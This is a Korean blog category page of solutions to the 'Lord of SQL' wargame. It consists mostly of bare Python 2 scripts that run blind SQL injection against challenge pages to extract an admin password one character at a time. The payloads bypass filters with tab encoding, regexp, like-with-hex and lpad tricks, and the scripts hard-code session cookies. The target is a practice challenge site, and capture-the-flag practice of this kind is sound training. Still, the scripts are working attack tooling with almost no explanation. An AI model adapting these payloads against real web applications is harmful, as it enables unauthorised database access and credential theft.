'Wargame' 카테고리의 글 목록 (23 Page)

LOS xavis

Wargame/Lord of SQL 2018. 2. 8. 22:37

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdef"

for i in range(0,100):
    payload = "' or id='admin' and length(hex(pw))="+str(i)+"#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "' or id='admin' and right(lpad(hex(pw),"+str(j)+",space(0)),1)='"+strings[i]+"'#"
        if request(payload)==True:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS iron_golem (0)	2018.02.08
LOS dragon (0)	2018.02.08
LOS nightmare (0)	2018.02.08
LOS succubus (0)	2018.02.08
LOS zombie_assassin (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS nightmare

Wargame/Lord of SQL 2018. 2. 8. 22:11

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS dragon (0)	2018.02.08
LOS xavis (0)	2018.02.08
LOS succubus (0)	2018.02.08
LOS zombie_assassin (0)	2018.02.08
LOS assassin (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS succubus

Wargame/Lord of SQL 2018. 2. 8. 22:10

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS xavis (0)	2018.02.08
LOS nightmare (0)	2018.02.08
LOS zombie_assassin (0)	2018.02.08
LOS assassin (0)	2018.02.08
LOS giant (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS zombie_assassin

Wargame/Lord of SQL 2018. 2. 8. 22:09

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS nightmare (0)	2018.02.08
LOS succubus (0)	2018.02.08
LOS assassin (0)	2018.02.08
LOS giant (0)	2018.02.08
LOS bugbear (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS assassin

Wargame/Lord of SQL 2018. 2. 8. 22:08

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return "admin"
    elif "Hello guest" in str(response):
        return "guest"
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@"
tmp = ""
tmp1 = 0
payload = ""

for i in range(1,51):
    payload += "_"
    result = request(payload)
    if result=="admin":
        length = i
        break
    if result=="guest":
        tmp1 = i
    if i==50:
        length=tmp1



print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = admin_pw+strings[i]+"_"*(8-j)
        result = request(payload)
        if result == "admin":
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break
        if result == "guest":
            tmp = strings[i]
        if i==len(strings)-1:
            admin_pw+=tmp

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS succubus (0)	2018.02.08
LOS zombie_assassin (0)	2018.02.08
LOS giant (0)	2018.02.08
LOS bugbear (0)	2018.02.08
LOS darknight (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS giant

Wargame/Lord of SQL 2018. 2. 8. 22:08

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS zombie_assassin (0)	2018.02.08
LOS assassin (0)	2018.02.08
LOS bugbear (0)	2018.02.08
LOS darknight (0)	2018.02.08
LOS golem (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS bugbear

Wargame/Lord of SQL 2018. 2. 8. 22:07

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no="+data
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=dc3f1581bf2ce11c70afbb877548363c31517875851; PHPSESSID=4781bkenk59ojptdqpoj0um423')
    response = urllib2.urlopen(req).read()
    print str(response)

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

for i in range(0,50):
    payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09length(pw)%09regexp%09"+str(i)
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(48,127):
        if (i>57 and i<65) or (i>90 and i<97):
            continue
        payload = "1%09||%091%09regexp%091%09%26%26%09id%09regexp%09concat(char(97),char(100),char(109),char(105),char(110))%09%26%26%09right(left(pw,"+str(j)+"),1)%09regexp%09char("+str(i)+")"
        if request(payload)==True:
            admin_pw += chr(i)
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS assassin (0)	2018.02.08
LOS giant (0)	2018.02.08
LOS darknight (0)	2018.02.08
LOS golem (0)	2018.02.08
LOS skeleton (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS darknight

Wargame/Lord of SQL 2018. 2. 8. 21:17

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?no="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

for i in range(0,50):
    payload = "1 || 1 like 1 && id like 0x61646d696e && length(pw) like "+str(i)+"#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "1 || 1 like 1 && id like 0x61646d696e && right(left(pw,"+str(j)+"),1) like 0x"+strings[i].encode('hex')+"#"
        if request(payload)==True:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS giant (0)	2018.02.08
LOS bugbear (0)	2018.02.08
LOS golem (0)	2018.02.08
LOS skeleton (0)	2018.02.08
LOS vampire (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS golem

Wargame/Lord of SQL 2018. 2. 8. 21:16

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

for i in range(0,50):
    payload = "' || id like 'admin' && length(pw) like "+str(i)+"#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "' || id like 'admin' && pw like '"+admin_pw+strings[i]+"%'#"
        if request(payload)==True:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS bugbear (0)	2018.02.08
LOS darknight (0)	2018.02.08
LOS skeleton (0)	2018.02.08
LOS vampire (0)	2018.02.08
LOS troll (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

LOS skeleton

Wargame/Lord of SQL 2018. 2. 8. 21:02

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS darknight (0)	2018.02.08
LOS golem (0)	2018.02.08
LOS vampire (0)	2018.02.08
LOS troll (0)	2018.02.08
LOS orge (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

,

'Wargame'에 해당되는 글 454건

LOS xavis

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS nightmare

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS succubus

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS zombie_assassin

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS assassin

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS giant

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS bugbear

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS darknight

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS golem

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS skeleton

'Wargame > Lord of SQL' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바

« 2025/01 »
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31